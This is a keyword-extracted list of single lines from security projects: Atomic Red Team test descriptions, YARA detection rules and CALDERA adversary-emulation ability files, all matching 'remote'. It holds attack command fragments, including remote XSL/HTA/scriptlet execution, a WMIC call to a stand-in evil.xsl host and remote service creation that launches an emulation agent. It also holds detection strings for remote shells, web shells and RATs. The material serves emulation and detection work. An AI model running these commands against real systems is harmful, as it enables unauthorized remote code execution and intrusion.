atomic-red-team	T1218.003.md	## Atomic Test #1 - CMSTP Executing Remote Scriptlet	MIT License. © 2018 Red Canary
atomic-red-team	T1218.005.md	- Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject	MIT License. © 2018 Red Canary
atomic-red-team	T1218.005.md	- Atomic Test #3 - Mshta Executes Remote HTML Application (HTA)	MIT License. © 2018 Red Canary
atomic-red-team	T1218.005.md	## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject	MIT License. © 2018 Red Canary
atomic-red-team	T1218.005.md	Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched.	MIT License. © 2018 Red Canary
atomic-red-team	T1218.005.md	## Atomic Test #3 - Mshta Executes Remote HTML Application (HTA)	MIT License. © 2018 Red Canary
atomic-red-team	T1218.005.md	Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.	MIT License. © 2018 Red Canary
atomic-red-team	T1218.005.md	Executes an HTA Application by directly downloading from remote URI.	MIT License. © 2018 Red Canary
atomic-red-team	T1218.007.md	- Atomic Test #2 - Msiexec.exe - Execute Remote MSI file	MIT License. © 2018 Red Canary
atomic-red-team	T1218.007.md	## Atomic Test #2 - Msiexec.exe - Execute Remote MSI file	MIT License. © 2018 Red Canary
atomic-red-team	T1218.010.md	- Atomic Test #2 - Regsvr32 remote COM scriptlet execution	MIT License. © 2018 Red Canary
atomic-red-team	T1218.010.md	## Atomic Test #2 - Regsvr32 remote COM scriptlet execution	MIT License. © 2018 Red Canary
atomic-red-team	T1218.011.md	- Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject	MIT License. © 2018 Red Canary
atomic-red-team	T1218.011.md	## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject	MIT License. © 2018 Red Canary
atomic-red-team	T1218.011.md	Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.	MIT License. © 2018 Red Canary
atomic-red-team	T1219.md	# T1219 - Remote Access Software	MIT License. © 2018 Red Canary
atomic-red-team	T1219.md	<blockquote>An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)	MIT License. © 2018 Red Canary
atomic-red-team	T1219.md	Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.	MIT License. © 2018 Red Canary
atomic-red-team	T1220.md	Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)	MIT License. © 2018 Red Canary
atomic-red-team	T1220.md	Another variation of this technique, dubbed “Squiblytwo”, involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its Regsvr32/ “Squiblydoo” counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)	MIT License. © 2018 Red Canary
atomic-red-team	T1220.md	* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1220.md	- Atomic Test #2 - MSXSL Bypass using remote files	MIT License. © 2018 Red Canary
atomic-red-team	T1220.md	- Atomic Test #4 - WMIC bypass using remote XSL file	MIT License. © 2018 Red Canary
atomic-red-team	T1220.md	## Atomic Test #2 - MSXSL Bypass using remote files	MIT License. © 2018 Red Canary
atomic-red-team	T1220.md	Executes the code specified within a XSL script tag during XSL transformation using a remote payload.	MIT License. © 2018 Red Canary
atomic-red-team	T1220.md	| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml|	MIT License. © 2018 Red Canary
atomic-red-team	T1220.md	| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl|	MIT License. © 2018 Red Canary
atomic-red-team	T1220.md	## Atomic Test #4 - WMIC bypass using remote XSL file	MIT License. © 2018 Red Canary
atomic-red-team	T1220.md	Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test successfully executed, while AV turned off.	MIT License. © 2018 Red Canary
atomic-red-team	T1220.md	| remote_xsl_file | Remote location of an XSL payload. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl|	MIT License. © 2018 Red Canary
atomic-red-team	T1221.md	Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as Phishing and/or Taint Shared Content and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)	MIT License. © 2018 Red Canary
atomic-red-team	T1221.md	- Atomic Test #1 - WINWORD Remote Template Injection	MIT License. © 2018 Red Canary
atomic-red-team	T1221.md	## Atomic Test #1 - WINWORD Remote Template Injection	MIT License. © 2018 Red Canary
atomic-red-team	T1221.md	Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm	MIT License. © 2018 Red Canary
atomic-red-team	T1485.md	<blockquote>Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from Disk Content Wipe and Disk Structure Wipe because individual files are destroyed rather than sections of a storage disk or the disk’s logical structure.	MIT License. © 2018 Red Canary
atomic-red-team	T1486.md	<blockquote>Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)	MIT License. © 2018 Red Canary
atomic-red-team	T1529.md	<blockquote>Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.	MIT License. © 2018 Red Canary
atomic-red-team	T1546.008.md	Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as “sticky keys”, and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)	MIT License. © 2018 Red Canary
atomic-red-team	T1546.008.md	For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with “cmd.exe” (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)	MIT License. © 2018 Red Canary
atomic-red-team	T1546.012.md	Similar to Accessibility Features, on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures “cmd.exe,” or another program that provides backdoor access, as a “debugger” for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with Remote Desktop Protocol will cause the “debugger” program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)	MIT License. © 2018 Red Canary
atomic-red-team	T1547.001.md	Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1548.002.md	Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1550.002.md	When performing PtH, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.	MIT License. © 2018 Red Canary
atomic-red-team	T1550.003.md	<blockquote>Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account’s password. Kerberos authentication can be used as the first step to lateral movement to a remote system.	MIT License. © 2018 Red Canary
atomic-red-team	T1550.003.md	Requesting a TGT on a remote system and retrieving it locally before requesting a service ticket with it. This is a Pass-The-Ticket attack because the TGT is obtained on the remote system, then used from a different machine (local).	MIT License. © 2018 Red Canary
atomic-red-team	T1550.003.md	PsExec is used to execute commands on the remote system, and the “C$” admin share is used to retrieve the TGT, so the current user must have admin rights remotely and other PsExec prerequisites must be met.	MIT License. © 2018 Red Canary
atomic-red-team	T1550.003.md	| target | Remote system to request the TGT from | string | localhost|	MIT License. © 2018 Red Canary
atomic-red-team	T1552.001.md	<blockquote>Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.	MIT License. © 2018 Red Canary
atomic-red-team	T1552.004.md	Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. These private keys can be used to authenticate to Remote Services like SSH or for use in decrypting other collected files such as email.	MIT License. © 2018 Red Canary
atomic-red-team	T1552.004.md	- Atomic Test #7 - ADFS token signing and encryption certificates theft - Remote	MIT License. © 2018 Red Canary
atomic-red-team	T1552.004.md	## Atomic Test #7 - ADFS token signing and encryption certificates theft - Remote	MIT License. © 2018 Red Canary
atomic-red-team	T1562.004.md	netsh advfirewall firewall set rule group=”remote desktop” new enable=Yes	MIT License. © 2018 Red Canary
atomic-red-team	T1563.002.md	<blockquote>Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)	MIT License. © 2018 Red Canary
atomic-red-team	T1563.002.md	Adversaries may perform RDP session hijacking which involves stealing a legitimate user’s remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, c:\windows\system32\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to Remote System Discovery and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1569.002.md	- Atomic Test #2 - Use PsExec to execute a command on a remote host	MIT License. © 2018 Red Canary
atomic-red-team	T1569.002.md	## Atomic Test #2 - Use PsExec to execute a command on a remote host	MIT License. © 2018 Red Canary
atomic-red-team	T1569.002.md	Will start a process on a remote host.	MIT License. © 2018 Red Canary
atomic-red-team	T1569.002.md	Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost).	MIT License. © 2018 Red Canary
atomic-red-team	T1569.002.md	| remote_host | Remote hostname or IP address | String | localhost|	MIT License. © 2018 Red Canary
atomic-red-team	T1574.001.md	There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)	MIT License. © 2018 Red Canary
atomic-red-team	T1609.md	<blockquote>Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)	MIT License. © 2018 Red Canary
atomic-red-team	T1609.md	In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.(Citation: Kubectl Exec Get Shell)</blockquote>	MIT License. © 2018 Red Canary
signature-base	airbnb_binaryalert.yar	$a2 = “WS-Management is running on the remote host” wide ascii	CC BY-NC 4.0
signature-base	airbnb_binaryalert.yar	$s2 = “What command do you want to run on the remote system? >” fullword ascii wide	CC BY-NC 4.0
signature-base	apt_alienspy_rat.yar	description = “Alien Spy Remote Access Trojan”	CC BY-NC 4.0
signature-base	apt_apt29_nobelium_may21.yar	description = “The FRESHFIRE malware family. The malware acts as a downloader, pulling down an encrypted snippet of code from a remote source, executing it, and deleting it from the remote server.”	CC BY-NC 4.0
signature-base	apt_apt41.yar	$s4 = “Remote Desktop Services” fullword wide	CC BY-NC 4.0
signature-base	apt_ar18_165a.yar	description = “Hidden Cobra - Detects remote access trojan”	CC BY-NC 4.0
signature-base	apt_aus_parl_compromise.yar	$s3 = “local -> remote {0} bytes”	CC BY-NC 4.0
signature-base	apt_aus_parl_compromise.yar	$s4 = “remote -> local {0} bytes”	CC BY-NC 4.0
signature-base	apt_buckeye.yar	description = “Detects a remote access tool used by APT groups - file RemoteCmd.exe”	CC BY-NC 4.0
signature-base	apt_deeppanda.yar	$s1 = “Couldn’t delete target executable from remote machine: %d” fullword ascii	CC BY-NC 4.0
signature-base	apt_eqgrp_apr17.yar	$x4 = “Solaris rpc.cmsd remote root exploit” fullword ascii	CC BY-NC 4.0
signature-base	apt_eqgrp_apr17.yar	$x2 = “Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh"” fullword ascii	CC BY-NC 4.0
signature-base	apt_eqgrp_apr17.yar	$x1 = “[-] Connection closed by remote host (TCP Ack/Fin)” fullword ascii	CC BY-NC 4.0
signature-base	apt_eqgrp_apr17.yar	$x1 = “* Failed to get remote TCP socket address” fullword wide	CC BY-NC 4.0
signature-base	apt_eqgrp_apr17.yar	$s3 = “Connection closed by remote host (TCP Ack/Fin)” fullword ascii	CC BY-NC 4.0
signature-base	apt_fvey_shadowbroker_jan17.yar	$a1 = “Getting remote time” fullword ascii	CC BY-NC 4.0
signature-base	apt_industroyer.yar	$s2 = “return info-Remote command” fullword ascii	CC BY-NC 4.0
signature-base	apt_irontiger_trendmicro.yar	description = “dllshellexc2010 Exchange backdoor + remote shell”	CC BY-NC 4.0
signature-base	apt_oilrig_chafer_mar18.yar	$x2 = “Failed to notify rdp client process exit (MyrtilleAppPool down?), remote session {0} ({1})” fullword wide	CC BY-NC 4.0
signature-base	apt_oilrig_chafer_mar18.yar	$x3 = “Started rdp client process, remote session {0}” fullword wide	CC BY-NC 4.0
signature-base	apt_project_sauron_extras.yar	$s2 = “Remote Security Engine” fullword wide	CC BY-NC 4.0
signature-base	apt_sofacy_xtunnel_bundestag.yar	description = “Winexe tool for remote execution (also used by Sofacy group)”	CC BY-NC 4.0
signature-base	apt_terracotta.yar	description = “Remote Access Tool used in APT Terracotta”	CC BY-NC 4.0
signature-base	apt_turla.yar	$s4 = “File already exist on remote filesystem !” ascii fullword	CC BY-NC 4.0
signature-base	apt_turla_penquin.yar	$ = “File already exist on remote filesystem !” ascii fullword	CC BY-NC 4.0
signature-base	apt_unc2546_dewmode.yar	$s4 = “include "remote.inc";” ascii	CC BY-NC 4.0
signature-base	cn_pentestset_scripts.yar	$s0 = “print "[] Connected to remote host \n"; “ fullword ascii / PEStudio Blacklist: strings */	CC BY-NC 4.0
signature-base	crime_cn_group_btc.yar	description = “Detects Ammyy remote access tool”	CC BY-NC 4.0
signature-base	crime_cn_group_btc.yar	$s1 = “Please enter password for accessing remote computer” fullword ascii	CC BY-NC 4.0
signature-base	crime_ole_loadswf_cve_2018_4878.yar	vuln_type = “Remote Code Execution”	CC BY-NC 4.0
signature-base	exploit_cve_2018_16858.yar	reference = “https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html”	CC BY-NC 4.0
signature-base	gen_cn_hacktools.yar	$s3 = “- Remote DCOM RPC Buffer Overflow Exploit” fullword ascii	CC BY-NC 4.0
signature-base	gen_cn_hacktools.yar	$s8 = “Connecting to Remote Server …Failed” fullword ascii	CC BY-NC 4.0
signature-base	gen_cn_hacktools.yar	$s3 = “Radmin, Remote Administrator” fullword wide	CC BY-NC 4.0
signature-base	gen_cn_webshells.yar	$s1 = “printf("Could not connect to remote shell!\n");” fullword ascii	CC BY-NC 4.0
signature-base	gen_empire.yar	$s5 = “Remote URL to your own WARFile to deploy.” fullword ascii	CC BY-NC 4.0
signature-base	gen_empire.yar	$s2 = “remote DLL injection” ascii	CC BY-NC 4.0
signature-base	gen_fireeye_redteam_tools.yar	$str5 = “remote WIM image” ascii nocase wide	CC BY-NC 4.0
signature-base	gen_malware_set_qa.yar	$s4 = “I wasn’t able to open the hosts file, maybe because UAC is enabled in remote computer!” fullword ascii	CC BY-NC 4.0
signature-base	gen_powershell_susp.yar	$x1 = “Throw "Unable to allocate memory in the remote process for shellcode"” fullword ascii	CC BY-NC 4.0
signature-base	gen_rats_malwareconfig.yar	maltype = “Remote Access Trojan”	CC BY-NC 4.0
signature-base	gen_suspicious_strings.yar	$fp2 = “Remote Desktop in the Appveyor”	CC BY-NC 4.0
signature-base	gen_url_persitence.yar	description = “Detects remote SMB path for .URL persistence”	CC BY-NC 4.0
signature-base	gen_winshells.yar	$s3 = “get - download file" fullword ascii	CC BY-NC 4.0
signature-base	gen_winshells.yar	$s4 = “[ simple remote shell for windows v3” fullword ascii	CC BY-NC 4.0
signature-base	gen_winshells.yar	$s5 = “REMOTE: CreateFile("%s")” fullword ascii	CC BY-NC 4.0
signature-base	gen_winshells.yar	$s6 = “put - upload file" fullword ascii	CC BY-NC 4.0
signature-base	gen_winshells.yar	$s7 = “term - terminate remote client” fullword ascii	CC BY-NC 4.0
signature-base	gen_winshells.yar	$s2 = “[ simple remote shell for windows v1” fullword ascii	CC BY-NC 4.0
signature-base	gen_winshells.yar	$s4 = “[ simple remote shell for windows v4” fullword ascii	CC BY-NC 4.0
signature-base	gen_winshells.yar	$s2 = “get - download file" fullword ascii	CC BY-NC 4.0
signature-base	gen_winshells.yar	$s3 = “REMOTE: CreateFile("%s")” fullword ascii	CC BY-NC 4.0
signature-base	gen_winshells.yar	$s4 = “put - upload file" fullword ascii	CC BY-NC 4.0
signature-base	gen_winshells.yar	$s5 = “term - terminate remote client” fullword ascii	CC BY-NC 4.0
signature-base	gen_xtreme_rat.yar	$s2 = “Remote Service Application” fullword wide	CC BY-NC 4.0
signature-base	thor-hacktools.yar	$r = “Cannot query LSA Secret on remote host”	CC BY-NC 4.0
signature-base	thor-hacktools.yar	$s = “Cannot write to process memory on remote host”	CC BY-NC 4.0
signature-base	thor-hacktools.yar	$s0 = “made to port 80 of the remote machine at 192.168.1.101 with the” fullword ascii	CC BY-NC 4.0
signature-base	thor-hacktools.yar	$s1 = “c:\>nbtdump remote-machine” fullword ascii	CC BY-NC 4.0
signature-base	thor-hacktools.yar	description = “Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe”	CC BY-NC 4.0
signature-base	thor-hacktools.yar	$x5 = “Please enter password for accessing remote computer” fullword ascii	CC BY-NC 4.0
signature-base	thor-hacktools.yar	$s0 = “Connection closed by remote host” fullword ascii	CC BY-NC 4.0
signature-base	thor-hacktools.yar	$s2 = “Remote connection closed by signal SIG%s %s” fullword ascii	CC BY-NC 4.0
signature-base	thor-hacktools.yar	$s9 = “Remote host closed connection” fullword ascii	CC BY-NC 4.0
signature-base	thor-hacktools.yar	$x2 = “fgexec Remote Process Execution Tool” fullword ascii	CC BY-NC 4.0
signature-base	thor-hacktools.yar	$x4 = “Couldn’t delete target executable from remote machine: %d” fullword ascii	CC BY-NC 4.0
signature-base	thor-hacktools.yar	Identifier: BeyondExec Remote Access Tool	CC BY-NC 4.0
signature-base	thor-hacktools.yar	description = “Detects BeyondExec Remote Access Tool - file rexesvr.exe”	CC BY-NC 4.0
signature-base	thor-hacktools.yar	$ = “Radmin, Remote Administrator” wide	CC BY-NC 4.0
signature-base	thor-hacktools.yar	$x1 = “Error injecting remote thread in process:” fullword ascii	CC BY-NC 4.0
signature-base	thor-hacktools.yar	description = “Detects remote access tool PAEXec (like PsExec) - file PAExec.exe”	CC BY-NC 4.0
signature-base	thor-webshells.yar	$s1 = “"<h2>Remote Control »</h2><input class=\"bt\" onclick=\"var”	CC BY-NC 4.0
signature-base	thor-webshells.yar	$s0 = “”	CC BY-NC 4.0
signature-base	thor-webshells.yar	$s1 = “News Remote PHP Shell Injection”	CC BY-NC 4.0
signature-base	thor-webshells.yar	$s2 = “print "Asmodeus Perl Remote Shell”	CC BY-NC 4.0
signature-base	thor-webshells.yar	$s2 = “* as email attachment, or send to a remote ftp server by” fullword	CC BY-NC 4.0
signature-base	thor-webshells.yar	$s0 = “=====Remote Shell Closed=====”	CC BY-NC 4.0
signature-base	thor-webshells.yar	$s4 = “connect failed,check your network and remote ip.”	CC BY-NC 4.0
signature-base	thor_inverse_matches.yar	description = “Sethc.exe has been replaced - Indicates Remote Access Hack RDP”	CC BY-NC 4.0
signature-base	thor_inverse_matches.yar	description = “Detects a renamed remote access tool PAEXec (like PsExec)”	CC BY-NC 4.0
signature-base	vul_cve_2020_0688.yar	reference = “https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys”	CC BY-NC 4.0
stockpile	02de522f-7e0a-4544-8afc-0c195f400f5f.yml	- source: remote.ssh.cmd	Apache-2.0
stockpile	89955f55-529d-4d58-bed4-fed9e42515ec.yml	curl #{remote.host.socket}	Apache-2.0
stockpile	422526ec-27e9-429a-995b-c686a29561a4.yml	- source: remote.ssh.cmd	Apache-2.0
stockpile	422526ec-27e9-429a-995b-c686a29561a4.yml	- source: remote.ssh.cmd	Apache-2.0
stockpile	0360ede1-3c28-48d3-a6ef-6e98f562c5af.yml	name: Remote System Discovery	Apache-2.0
stockpile	13379ae1-d20e-4162-91f8-320d78a35e7f.yml	name: Remote System Discovery	Apache-2.0
stockpile	13379ae1-d20e-4162-91f8-320d78a35e7f.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	26c8b8b5-7b5b-4de1-a128-7d37fb14f517.yml	description: Identify the remote domain controllers	Apache-2.0
stockpile	26c8b8b5-7b5b-4de1-a128-7d37fb14f517.yml	name: Remote System Discovery	Apache-2.0
stockpile	2afae782-6d0a-4fbd-a6b6-d1ce90090eac.yml	description: Use PowerView to query the Active Directory server to determine remote admins	Apache-2.0
stockpile	2afae782-6d0a-4fbd-a6b6-d1ce90090eac.yml	Get-NetLocalGroupMember -ComputerName #{remote.host.fqdn} -Credential $credObject	Apache-2.0
stockpile	2afae782-6d0a-4fbd-a6b6-d1ce90090eac.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	2afae782-6d0a-4fbd-a6b6-d1ce90090eac.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml	nmap -sV -p #{remote.host.port} #{remote.host.ip}	Apache-2.0
stockpile	47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml	python3 scanner.py -i #{remote.host.ip}	Apache-2.0
stockpile	47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml	- source: remote.host.ip	Apache-2.0
stockpile	47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml	target: remote.host.port	Apache-2.0
stockpile	5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml	name: Remote System Discovery	Apache-2.0
stockpile	6d90e6fa-9324-4eb5-93be-9f737245bd7z.yml	description: Use PowerView to query the Active Directory server to determine remote admins	Apache-2.0
stockpile	6d90e6fa-9324-4eb5-93be-9f737245bd7z.yml	Get-NetLocalGroupMember -ComputerName #{remote.host.fqdn}	Apache-2.0
stockpile	6d90e6fa-9324-4eb5-93be-9f737245bd7z.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	85341c8c-4ecb-4579-8f53-43e3e91d7617.yml	name: Remote System Discovery	Apache-2.0
stockpile	85341c8c-4ecb-4579-8f53-43e3e91d7617.yml	- source: remote.host.ip	Apache-2.0
stockpile	921055f4-5970-4707-909e-62f594234d91.yml	name: Remote Host Ping	Apache-2.0
stockpile	921055f4-5970-4707-909e-62f594234d91.yml	description: Ping a remote host to see if it is accessible	Apache-2.0
stockpile	921055f4-5970-4707-909e-62f594234d91.yml	ping #{remote.host.fqdn}	Apache-2.0
stockpile	921055f4-5970-4707-909e-62f594234d91.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	921055f4-5970-4707-909e-62f594234d91.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	ce485320-41a4-42e8-a510-f5a8fe96a644.yml	name: Remote System Discovery	Apache-2.0
stockpile	deeac480-5c2a-42b5-90bb-41675ee53c7e.yml	name: View remote shares	Apache-2.0
stockpile	deeac480-5c2a-42b5-90bb-41675ee53c7e.yml	description: View the shares of a remote host	Apache-2.0
stockpile	deeac480-5c2a-42b5-90bb-41675ee53c7e.yml	command: net view \\#{remote.host.fqdn} /all	Apache-2.0
stockpile	deeac480-5c2a-42b5-90bb-41675ee53c7e.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	deeac480-5c2a-42b5-90bb-41675ee53c7e.yml	target: remote.host.share	Apache-2.0
stockpile	fa4ed735-7006-4451-a578-b516f80e559f.yml	description: Find hostname of remote IP in domain	Apache-2.0
stockpile	fa4ed735-7006-4451-a578-b516f80e559f.yml	name: Remote System Discovery	Apache-2.0
stockpile	fa4ed735-7006-4451-a578-b516f80e559f.yml	nslookup #{remote.host.ip}	Apache-2.0
stockpile	fa4ed735-7006-4451-a578-b516f80e559f.yml	- source: remote.host.fqdn	Apache-2.0
stockpile	fa4ed735-7006-4451-a578-b516f80e559f.yml	target: remote.host.ip	Apache-2.0
stockpile	fdf8bf36-797f-4157-805b-fe7c1c6fc903.yml	description: Find hostname of remote host	Apache-2.0
stockpile	fdf8bf36-797f-4157-805b-fe7c1c6fc903.yml	name: Remote System Discovery	Apache-2.0
stockpile	fdf8bf36-797f-4157-805b-fe7c1c6fc903.yml	nbtstat -A #{remote.host.ip}	Apache-2.0
stockpile	95727b87-175c-4a69-8c7a-a5d82746a753.yml	description: Create a service named "sandsvc" to execute remote 54ndc57 binary named "s4ndc4t.exe"	Apache-2.0
stockpile	95727b87-175c-4a69-8c7a-a5d82746a753.yml	sc.exe \\#{remote.host.fqdn} stop sandsvc;	Apache-2.0
stockpile	95727b87-175c-4a69-8c7a-a5d82746a753.yml	sc.exe \\#{remote.host.fqdn} delete sandsvc /f;	Apache-2.0
stockpile	95727b87-175c-4a69-8c7a-a5d82746a753.yml	taskkill /s \\#{remote.host.fqdn} /FI "Imagename eq s4ndc4t.exe"	Apache-2.0
stockpile	95727b87-175c-4a69-8c7a-a5d82746a753.yml	sc.exe \\#{remote.host.fqdn} create sandsvc start= demand error= ignore binpath= "cmd /c start C:\Users\Public\s4ndc4t.exe -server #{server} -v -originLinkID #{origin_link_id}" displayname= "Sandcat Execution";	Apache-2.0
stockpile	95727b87-175c-4a69-8c7a-a5d82746a753.yml	sc.exe \\#{remote.host.fqdn} start sandsvc;	Apache-2.0
